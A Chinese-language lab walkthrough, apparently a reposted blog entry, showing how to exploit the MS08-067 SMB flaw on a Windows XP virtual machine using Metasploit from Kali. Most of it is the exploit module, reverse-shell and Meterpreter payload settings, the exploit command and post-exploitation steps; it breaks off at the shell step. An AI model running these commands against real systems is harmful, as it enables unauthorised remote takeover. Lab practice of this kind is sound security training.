MS08-067漏洞 远程溢出入侵测试

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击. 

MS08_067漏洞渗透攻击实践

实验前准备

1、两台虚拟机,其中一台为kali(10.10.10.128),一台为windows xp sp3(10.10.10.130)。

2、使用nmap扫描到目标机存在ms08_067漏洞

MS08-067漏洞 远程溢出入侵测试_第1张图片

MS08_067远程漏洞攻击实践:Shell

1、在kali终端中开启msfconsole。

2、输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:

MS08-067漏洞 远程溢出入侵测试_第2张图片

3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

4、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

MS08-067漏洞 远程溢出入侵测试_第3张图片

5、命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:

MS08-067漏洞 远程溢出入侵测试_第4张图片

6、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

7、输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。

MS08-067漏洞 远程溢出入侵测试_第5张图片

8、输入命令

set LHOST "kali Ip" 

set RHOST "Win xp Ip"

并使用命令show options再次查看payload状态。

MS08-067漏洞 远程溢出入侵测试_第6张图片

9、输入命令exploit开始攻击,如下图所示是正常攻击成功结果。

MS08-067漏洞 远程溢出入侵测试_第7张图片

在kali上执行ipconfig/all得到如下图所示:

MS08-067漏洞 远程溢出入侵测试_第8张图片

在win xp上执行同样的命令,如下图所示:

MS08-067漏洞 远程溢出入侵测试_第9张图片

MS08_067远程漏洞攻击实践:meterpreter

1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

2、设置payload:set payload windows/meterpreter/reverse_tcp

3、show options,查看需要设置的ip地址,如下图所示,是已经设置好的

MS08-067漏洞 远程溢出入侵测试_第10张图片

4、成功攻击结果:

MS08-067漏洞 远程溢出入侵测试_第11张图片

5、执行ifconfig,查看靶机地址:

MS08-067漏洞 远程溢出入侵测试_第12张图片

6、ps查看进程:

MS08-067漏洞 远程溢出入侵测试_第13张图片

7、meterpreter转shell:

你可能感兴趣的:(MS08-067漏洞 远程溢出入侵测试)